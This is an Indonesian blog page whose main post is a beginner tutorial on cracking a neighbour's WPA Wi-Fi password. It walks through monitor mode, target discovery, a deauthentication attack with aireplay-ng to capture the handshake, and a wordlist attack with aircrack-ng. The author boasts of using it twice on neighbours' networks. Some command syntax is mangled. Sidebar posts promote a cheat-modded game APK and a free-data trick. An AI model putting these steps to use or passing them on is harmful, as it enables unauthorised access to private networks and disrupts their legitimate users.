Skip to main content

Game Android Mirip Gta Online/Offline

Game third person shooter open-world dengan mode permainan yang berbeda seperti Team death-match, menjelajahi kota sendirian atau bergabung dengan teman-teman Anda melalui jaringan! Catatan: Android 2.3.3+ dan setidaknya 512 ram. Follow Creator : Twitter > twitter.com/mammaddev Discord > discord.me/laconline Link download game : KLIK DISINI Size : 178 MB Instal Game dan mainkan dengan teman anda secara Online/Offline dengan berpetualang sendiri

HACK WIFI DENGAN KALI LINUX

Asalamualaikum wr.wb

Ok guys, selain bercerita tentang keseharian gue. Disini gue juga sering buka-buka sedikit terminal kali linux gue, namun gue bukanlah seorang mastah atau hacker, gue Cuma seorang newbie yang belajar sedikit dari orang lain.
Sudah banyak banget tutorialnya di Internet, Namun jika terkadang orang ada yang sulit memahami tutorial yang berbentuk video. Jadi saya akan berusaha untuk memberikan tutorial tulisan.
Jika kamu iseng-iseng, disamping rumah ada wifi namun ga bisa dipake karena disandi oleh penggunanya. Mari kita coba intip sedikit.
Pertama, karena disini saya pakai kali linux, jadi kalian juga pasti pakai kali linux.
Untuk tutorial pertama saya ini, kita pakai Crack dlu. Jadi dapet apa engga passwordnya tergantung dari lengkap apa engga crack tu gan. Ya nasip2an gitu, kalo passwordnya susah ya lamaaa…
Cari terlebih dahulu Wordlistnya, jika tidak ada di kali linux menyediakan wordlist bawaan, yaitu terdapat di  Usr=>Share=>Password=>rockyou.txt
Atau kalian bisa download di google, dan cari wordlist yang lebih besar ukurannya. Seperti 4 gb, insya allah dapet..
Langsung saja,
1.       Buka Terminal Kali Linux 2.0 anda..
2.       Aktivkan Adapter Wlan anda
Ketiikkan :  airmon-ng start wlan0

3.       Langkah selanjutnya, cari target..
Ketikkan : airodump-ng wlan0mon
Ket : untuk interfacesnya dapat dilihat dilayar, apakah pake wlan0mon atau wlan0monmon, karena mungkin sudah mengaktivkan adapter wlan0mon sebelumnya.

4.       Jika sudah dapat terget-nya, lihat CH (Channel) dan BSSID-nya..
Ketikkan : Airodump-ng –c (channelnya) –bssid (alamat Bssidnya) wlan0mon –w /root/terserahkamu

5.       Buka Tab Terminal baru, CTRL+SHIFT+T

6.       Jika sudah, maka akan masuk ke tahap selanjutnya, lihat di pojok kanan atas apa sudah ada handshakenya atau belum. Jika belum maka cari terlebih dahulu.
Untuk mencarinya, jaringan tersebut minimal ada yang menggunakan minimal 1 orang.
Copy address penggunanya yang berada dibawah alamat tesebut.
Ketikkan : aireplay-ng -0 0 –a (alamat BSSID) –c (alamat IP Pengguna) wlan0mon
7.       Biarkan prosesnya sampai kita mendapatkan handshake tersebut.
Lihat ke tab sebelumnya, jika handshake sudah di dapatkan, maka kita dapat melanjutkan ke tahap berikutnya.

Sebelumnya agar lebih mudah, copy wordlist yang anda punya atau wordlist bawaan tadi ke Desktop.
Kembali ke terminal, Ketikkan : Aircrack-ng –a2 –b(handshakenya) wlan0mon –w /root/Desktop/rockyou.txt (spasi) /root/*.cap

Kemudian kita hanya perlu menunggu sampai password wifinya terlacak dengan sendirinya.

Jika ada yang binggung dan pasti masih binggung karena belum ada gambarnya, saya tidak sempat memberikan screenshotnya karena laptop saya baru saja saya instal ulang. Jadi silahkan bertanya, seputar yang diatas, karena saya juga belajar jadi mari sama-sama belajar. Disini saya hanya berbagi ilmu. Tapi setidaknya sudah 2x saya dapet wifi tetangga. Hehe,, ga halal yaa.. jadi dosa deh gue.


sumber : ryandairy

Comments

Popular posts from this blog

Game Android Mirip Gta Online/Offline

Game third person shooter open-world dengan mode permainan yang berbeda seperti Team death-match, menjelajahi kota sendirian atau bergabung dengan teman-teman Anda melalui jaringan! Catatan: Android 2.3.3+ dan setidaknya 512 ram. Follow Creator : Twitter > twitter.com/mammaddev Discord > discord.me/laconline Link download game : KLIK DISINI Size : 178 MB Instal Game dan mainkan dengan teman anda secara Online/Offline dengan berpetualang sendiri

AVATAR WORLD ONLINE MOD V 250 APK

AVATAR WORLD ONLINE MOD [APK] [ ] Menu Fitur [-] Auto Chat [-] Auto Kiss [-] Auto Fishing [-] Auto Diamond [-] Auto Reply Teacher (Park) [-] Auto Help Teacher (Park) [-] Auto Farm [-] Move Fast Area LANGSUNG TANCAP GAS MHANK >>> DOWNLOAD KLIK DISINI <<< Akhir kata Wasalamualaikum Wr.Wb

KUOTA 1 GB GRATIS DARI TELKOMSEL

Asalamualaikum wr.wb Kali ini admin mawu bagi2 trick dpt kuota Gratis 1gb dari Telkomsel, Ikuti Step by Stepnya : Sediakan kartu perdana telkomsel boleh as, simpati maupun simpati loop. Langsung aja agan dial kode USSD  *550*933# Agan tinggal menunggu balasan sms dari 3636 Replay pesan 3636 dengan keti FLASH <spasi> YA kirim ke 3636 Cek kuota Telkomsel di *889# Selamat mencoba.. Factor lucky berperan penting ^_^